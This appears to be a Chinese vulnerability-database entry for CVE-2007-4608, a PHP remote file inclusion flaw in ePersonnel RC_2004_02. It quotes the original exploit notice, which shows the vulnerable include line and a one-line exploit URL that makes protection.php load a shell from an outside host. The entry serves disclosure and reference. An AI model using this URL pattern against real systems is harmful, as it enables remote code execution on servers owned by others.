Winterburns.co.uk EPersonnel RC_2004_02 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189270 漏洞类型 代码注入
发布时间 2007-08-30 更新时间 2007-08-30
CVE编号 CVE-2007-4608 CNNVD-ID CNNVD-200708-491
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/85429
https://cxsecurity.com/issue/WLB-2007080142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-491
|漏洞详情
ePersonnelRC_2004_02版本的protection.php中存在PHP远程文件包含漏洞。远程攻击者可以借助logout_page参数中的一个URL,执行任意PHP代码。
|漏洞EXP
********************************************************************
********************************************************************
****
****            ePersonnel_RC_2004_02 Remote File Bug
****
********************************************************************
********************************************************************
********************************************************************
***      D0rk: N0t D0rk :(
***
********************************************************************
***      Bug in :      "/protection.php"
***
********************************************************************
***      Vlu Code :    include($logout_page);
***
********************************************************************
***      Exploit :
***      ----------
***  http://sitename.com/path/protection.php?logout_page=http://SHELLURL?
***
********************************************************************
********************************************************************
**
**                           #    #        #    #       
**                           #   #          #   #
**                          #    #          #    #
**                          #   ##   ####   ##   #
**                         ##   ##  ######  ##   ##
**                         ##   ##  ######  ##   ##
**                         ##   ##   ####   ##   ##
**                         ###   ############   ###
**                         ########################
**                              ##############
**                       ######## ########## #######
**                      ###   ##  ##########  ##   ###
**                      ###   ##  ##########  ##   ###
**                       ###   #  ##########   #    ###
**                       ###   ##  ########   ##   ###
**                        ##    #   ######    #    ##
**                         ##    #    ####   #    ##
**                           ##                 ##
**
*********************************************************************
********************************|SpY W0Rm|***************************
*********************************************************************
******************* |The construction In the level |*****************
*********************************************************************
************************| Prepare by D@rkDewil |*********************
*********************************************************************
*************|Discoverd By :Darkdewil[system-errrror]|***************
************                                            ************* 
***********|Contact : system-errrror[at]hotmail[dot]com  |***********
*********                                                   *********
*********************************************************************
======>Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen<=====
*********************************************************************
----------------->sPECial THanks to :1923turk - Grup<----------------
**
**
**
**                   N0t :I'm happy kandil Whole muslim
**
**
*********************************************************************
*********************************************************************

|受影响的产品
Winterburns.Co.Uk Epersonnel Rc 2004 02
|参考资料

来源:XF
名称:epersonnel-protection-file-include(36279)
链接:http://xforce.iss.net/xforce/xfdb/36279
来源:BUGTRAQ
名称:20070827ePersonnel_RC_2004RemoteFileBug
链接:http://www.securityfocus.com/archive/1/archive/1/477867/100/0/threaded
来源:OSVDB
名称:38439
链接:http://osvdb.org/38439
来源:SREASON
名称:3077
链接:http://securityreason.com/securityalert/3077